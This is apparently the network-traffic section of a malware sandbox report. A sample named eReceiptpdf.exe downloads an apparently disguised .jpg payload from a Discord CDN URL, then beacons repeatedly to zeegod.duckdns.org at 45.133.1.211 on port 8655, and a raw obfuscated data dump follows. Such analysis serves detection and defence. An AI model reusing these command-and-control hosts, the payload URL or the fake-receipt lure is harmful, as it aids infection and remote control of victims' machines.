Oct 27, 2021 03:04:34.892891884 CEST	49802	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:34.942687988 CEST	8655	49802	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:34.953983068 CEST	49802	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:34.980581045 CEST	8655	49802	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:35.021514893 CEST	49802	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:35.167735100 CEST	49802	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:35.216084003 CEST	8655	49802	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:35.216981888 CEST	49802	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:35.246027946 CEST	8655	49802	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:35.287247896 CEST	49802	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:35.315732002 CEST	8655	49802	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:35.316399097 CEST	49802	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:35.343427896 CEST	8655	49802	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:35.343697071 CEST	49802	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:35.370470047 CEST	8655	49802	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:35.370913029 CEST	49802	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:35.447282076 CEST	8655	49802	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:35.568947077 CEST	49802	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:35.648772001 CEST	8655	49802	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:36.210763931 CEST	8655	49802	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:36.255959034 CEST	49802	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:36.570053101 CEST	49802	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:36.642884016 CEST	8655	49802	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:37.585048914 CEST	49802	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:41.758407116 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:41.784821987 CEST	8655	49804	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:41.785048962 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:41.785895109 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:41.842159986 CEST	8655	49804	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:41.882433891 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:41.922406912 CEST	8655	49804	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:41.975114107 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:42.164758921 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:42.220247984 CEST	8655	49804	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:42.225784063 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:42.258219957 CEST	8655	49804	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:42.303374052 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:42.358525991 CEST	8655	49804	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:42.412653923 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:42.441747904 CEST	8655	49804	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:42.442110062 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:42.481874943 CEST	8655	49804	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:42.482130051 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:42.509535074 CEST	8655	49804	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:42.553303003 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:42.616713047 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:42.698358059 CEST	8655	49804	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:43.659003019 CEST	49804	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:48.240292072 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:48.268522978 CEST	8655	49805	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:48.268795967 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:48.608357906 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:48.662125111 CEST	8655	49805	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:48.682962894 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:48.710387945 CEST	8655	49805	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:48.757160902 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:48.758027077 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:48.833924055 CEST	8655	49805	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:48.930485010 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:48.979568005 CEST	8655	49805	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:48.980798006 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:49.020721912 CEST	8655	49805	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:49.069459915 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:49.187192917 CEST	8655	49805	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:49.241352081 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:49.268923998 CEST	8655	49805	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:49.288743973 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:49.315809011 CEST	8655	49805	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:49.315895081 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:49.342736959 CEST	8655	49805	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:49.378628969 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:49.454963923 CEST	8655	49805	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:49.982563972 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:50.061176062 CEST	8655	49805	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:51.013642073 CEST	49805	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:55.684806108 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:55.711467028 CEST	8655	49806	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:55.711651087 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:55.712891102 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:55.765964031 CEST	8655	49806	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:55.820266962 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:55.844647884 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:55.873047113 CEST	8655	49806	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:55.929445982 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:56.253365040 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:56.327713966 CEST	8655	49806	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:56.466775894 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:56.507971048 CEST	8655	49806	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:56.518063068 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:56.544392109 CEST	8655	49806	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:56.585791111 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:56.613070965 CEST	8655	49806	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:56.613663912 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:56.640678883 CEST	8655	49806	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:56.640820026 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:56.667845011 CEST	8655	49806	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:56.668013096 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:56.754172087 CEST	8655	49806	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:57.182740927 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:04:57.258739948 CEST	8655	49806	45.133.1.211	192.168.2.3
Oct 27, 2021 03:04:58.164829969 CEST	49806	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:02.372170925 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:02.398782015 CEST	8655	49807	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:02.399032116 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:02.400161028 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:02.455929041 CEST	8655	49807	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:02.456563950 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:02.483732939 CEST	8655	49807	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:02.539434910 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:02.899666071 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:02.944803953 CEST	8655	49807	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:02.980971098 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:03.007400036 CEST	8655	49807	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:03.055052996 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:03.081887960 CEST	8655	49807	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:03.082511902 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:03.109673023 CEST	8655	49807	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:03.109808922 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:03.136717081 CEST	8655	49807	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:03.136811018 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:03.222615004 CEST	8655	49807	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:03.222727060 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:03.300827026 CEST	8655	49807	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:04.211874008 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:04.292470932 CEST	8655	49807	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:05.228622913 CEST	49807	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:09.270025969 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:09.296341896 CEST	8655	49808	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:09.296634912 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:09.297214985 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:09.350244045 CEST	8655	49808	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:09.350809097 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:09.377924919 CEST	8655	49808	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:09.430656910 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:10.259433031 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:10.337208986 CEST	8655	49808	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:10.624069929 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:10.675378084 CEST	8655	49808	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:10.676117897 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:10.702770948 CEST	8655	49808	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:10.759020090 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:10.785770893 CEST	8655	49808	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:10.786268950 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:10.813735008 CEST	8655	49808	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:10.814109087 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:10.841320038 CEST	8655	49808	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:10.883894920 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:14.334197998 CEST	8655	49808	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:14.389775038 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:16.530797005 CEST	8655	49808	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:16.579864979 CEST	49808	8655	192.168.2.3	45.133.1.211
Oct 27, 2021 03:05:19.335635900 CEST	8655	49808	45.133.1.211	192.168.2.3
Oct 27, 2021 03:05:19.383848906 CEST	49808	8655	192.168.2.3	45.133.1.211

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2021 03:03:07.239691019 CEST	53910	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:03:07.260812998 CEST	53	53910	8.8.8.8	192.168.2.3
Oct 27, 2021 03:03:12.676012993 CEST	64021	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:03:12.789427996 CEST	53	64021	8.8.8.8	192.168.2.3
Oct 27, 2021 03:03:19.367018938 CEST	60784	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:03:19.480922937 CEST	53	60784	8.8.8.8	192.168.2.3
Oct 27, 2021 03:03:25.574836016 CEST	51143	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:03:25.595724106 CEST	53	51143	8.8.8.8	192.168.2.3
Oct 27, 2021 03:03:27.888731003 CEST	59026	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:03:27.907144070 CEST	53	59026	8.8.8.8	192.168.2.3
Oct 27, 2021 03:03:34.803560019 CEST	52130	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:03:34.917521954 CEST	53	52130	8.8.8.8	192.168.2.3
Oct 27, 2021 03:03:42.055043936 CEST	55102	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:03:42.169713020 CEST	53	55102	8.8.8.8	192.168.2.3
Oct 27, 2021 03:03:48.842617989 CEST	56236	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:03:48.955141068 CEST	53	56236	8.8.8.8	192.168.2.3
Oct 27, 2021 03:03:58.160204887 CEST	63297	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:03:58.273962975 CEST	53	63297	8.8.8.8	192.168.2.3
Oct 27, 2021 03:04:05.158982992 CEST	51539	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:04:05.177237988 CEST	53	51539	8.8.8.8	192.168.2.3
Oct 27, 2021 03:04:12.326107979 CEST	50585	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:04:12.438122034 CEST	53	50585	8.8.8.8	192.168.2.3
Oct 27, 2021 03:04:20.259135008 CEST	63456	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:04:20.373141050 CEST	53	63456	8.8.8.8	192.168.2.3
Oct 27, 2021 03:04:27.251183987 CEST	58540	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:04:27.364975929 CEST	53	58540	8.8.8.8	192.168.2.3
Oct 27, 2021 03:04:34.581033945 CEST	55108	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:04:34.601500034 CEST	53	55108	8.8.8.8	192.168.2.3
Oct 27, 2021 03:04:41.737194061 CEST	64432	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:04:41.755405903 CEST	53	64432	8.8.8.8	192.168.2.3
Oct 27, 2021 03:04:48.125134945 CEST	49250	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:04:48.238482952 CEST	53	49250	8.8.8.8	192.168.2.3
Oct 27, 2021 03:04:55.556725025 CEST	63490	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:04:55.682456017 CEST	53	63490	8.8.8.8	192.168.2.3
Oct 27, 2021 03:05:02.351448059 CEST	65110	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:05:02.370592117 CEST	53	65110	8.8.8.8	192.168.2.3
Oct 27, 2021 03:05:09.249598026 CEST	61120	53	192.168.2.3	8.8.8.8
Oct 27, 2021 03:05:09.268933058 CEST	53	61120	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 27, 2021 03:03:07.239691019 CEST	192.168.2.3	8.8.8.8	0x6a8e	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:12.676012993 CEST	192.168.2.3	8.8.8.8	0x3005	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:19.367018938 CEST	192.168.2.3	8.8.8.8	0xf996	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:25.574836016 CEST	192.168.2.3	8.8.8.8	0x7f13	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:27.888731003 CEST	192.168.2.3	8.8.8.8	0x939b	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:34.803560019 CEST	192.168.2.3	8.8.8.8	0x3f7e	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:42.055043936 CEST	192.168.2.3	8.8.8.8	0xdbc	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:48.842617989 CEST	192.168.2.3	8.8.8.8	0x9e39	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:58.160204887 CEST	192.168.2.3	8.8.8.8	0xd0b8	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:05.158982992 CEST	192.168.2.3	8.8.8.8	0x3241	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:12.326107979 CEST	192.168.2.3	8.8.8.8	0x9908	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:20.259135008 CEST	192.168.2.3	8.8.8.8	0xff10	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:27.251183987 CEST	192.168.2.3	8.8.8.8	0x9dd	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:34.581033945 CEST	192.168.2.3	8.8.8.8	0x533	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:41.737194061 CEST	192.168.2.3	8.8.8.8	0xa7f6	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:48.125134945 CEST	192.168.2.3	8.8.8.8	0x8733	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:55.556725025 CEST	192.168.2.3	8.8.8.8	0x610a	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:05:02.351448059 CEST	192.168.2.3	8.8.8.8	0xbb8a	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)
Oct 27, 2021 03:05:09.249598026 CEST	192.168.2.3	8.8.8.8	0x8857	Standard query (0)	zeegod.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 27, 2021 03:03:07.260812998 CEST	8.8.8.8	192.168.2.3	0x6a8e	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:07.260812998 CEST	8.8.8.8	192.168.2.3	0x6a8e	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:07.260812998 CEST	8.8.8.8	192.168.2.3	0x6a8e	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:07.260812998 CEST	8.8.8.8	192.168.2.3	0x6a8e	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:07.260812998 CEST	8.8.8.8	192.168.2.3	0x6a8e	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:12.789427996 CEST	8.8.8.8	192.168.2.3	0x3005	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:19.480922937 CEST	8.8.8.8	192.168.2.3	0xf996	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:25.595724106 CEST	8.8.8.8	192.168.2.3	0x7f13	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:25.595724106 CEST	8.8.8.8	192.168.2.3	0x7f13	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:25.595724106 CEST	8.8.8.8	192.168.2.3	0x7f13	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:25.595724106 CEST	8.8.8.8	192.168.2.3	0x7f13	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:25.595724106 CEST	8.8.8.8	192.168.2.3	0x7f13	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:27.907144070 CEST	8.8.8.8	192.168.2.3	0x939b	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:29.073473930 CEST	8.8.8.8	192.168.2.3	0x18b0	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Oct 27, 2021 03:03:34.917521954 CEST	8.8.8.8	192.168.2.3	0x3f7e	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:42.169713020 CEST	8.8.8.8	192.168.2.3	0xdbc	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:48.955141068 CEST	8.8.8.8	192.168.2.3	0x9e39	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:03:58.273962975 CEST	8.8.8.8	192.168.2.3	0xd0b8	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:05.177237988 CEST	8.8.8.8	192.168.2.3	0x3241	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:12.438122034 CEST	8.8.8.8	192.168.2.3	0x9908	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:20.373141050 CEST	8.8.8.8	192.168.2.3	0xff10	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:27.364975929 CEST	8.8.8.8	192.168.2.3	0x9dd	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:34.601500034 CEST	8.8.8.8	192.168.2.3	0x533	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:41.755405903 CEST	8.8.8.8	192.168.2.3	0xa7f6	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:48.238482952 CEST	8.8.8.8	192.168.2.3	0x8733	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:04:55.682456017 CEST	8.8.8.8	192.168.2.3	0x610a	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:05:02.370592117 CEST	8.8.8.8	192.168.2.3	0xbb8a	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)
Oct 27, 2021 03:05:09.268933058 CEST	8.8.8.8	192.168.2.3	0x8857	No error (0)	zeegod.duckdns.org		45.133.1.211	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cdn.discordapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49715	162.159.129.233	443	C:\Users\user\Desktop\eReceiptpdf.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-27 01:03:07 UTC	0	OUT	GET /attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2021-10-27 01:03:08 UTC	0	IN	HTTP/1.1 200 OK Date: Wed, 27 Oct 2021 01:03:08 GMT Content-Type: image/jpeg Content-Length: 976828 Connection: close CF-Ray: 6a4800b9ae585c32-FRA Accept-Ranges: bytes Cache-Control: public, max-age=31536000 ETag: "be30f5911bc96f37b49a11905d15afac" Expires: Thu, 27 Oct 2022 01:03:08 GMT Last-Modified: Tue, 26 Oct 2021 20:23:59 GMT Vary: Accept-Encoding CF-Cache-Status: MISS Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1635279839570116 x-goog-hash: crc32c=xGchCA== x-goog-hash: md5=vjD1kRvJbze0mhGQXRWvrA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 976828 X-GUploader-UploadID: ADPycduDNcNKudAcRz6osKTk_KjWwpIcT_kNR8UJ2V--3Z8m0poOiEMI9P_muZLQC_1wabNpP26rayGI7bwnkyAWlSI X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X5T07TEmxOms29tzvpsa22nV%2BBmQ3L8Porj5NrLbEdXq0JlyypQyf9zQ%2FE2ukwW5eWSb6k0tDjNMJYZrrGwYVSuGWEOK12f2mSbMUgdMw2TLTwO6e82QL2Pml326qP5LXn%2FbPg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
2021-10-27 01:03:08 UTC	1	IN	Data Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a Data Ascii: Server: cloudflare
2021-10-27 01:03:08 UTC	1	IN	Data Raw: 68 71 65 6a 78 63 49 77 70 4f 2d 77 77 20 4f 68 20 71 78 78 20 68 20 6a 20 68 20 68 20 68 20 78 20 68 20 68 20 68 20 65 63 63 20 65 63 63 20 68 20 68 20 71 70 78 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 49 78 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 71 65 70 20 68 20 68 20 68 20 71 78 20 6a 71 20 71 70 49 20 71 78 20 68 20 71 70 68 20 4f 20 65 68 63 20 6a 6a 20 71 70 78 20 71 20 77 49 20 65 68 63 20 6a 6a 20 70 78 20 71 68 78 20 71 68 63 20 71 71 63 20 6a 65 20 71 71 65 20 71 71 78 20 71 71 71 20 71 68 6a 20 71 71 78 20 4f 77 20 71 68 4f 20 6a 65 20 4f 4f 20 4f 77 20 71 71 68 20 71 Data Ascii: hqejxcIwpO-ww Oh qxx h j h h h x h h h ecc ecc h h qpx h h h h h h h Ix h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h qep h h h qx jq qpI qx h qph O ehc jj qpx q wI ehc jj px qhx qhc qqc je qqe qqx qqq qhj qqx Ow qhO je OO Ow qqh q
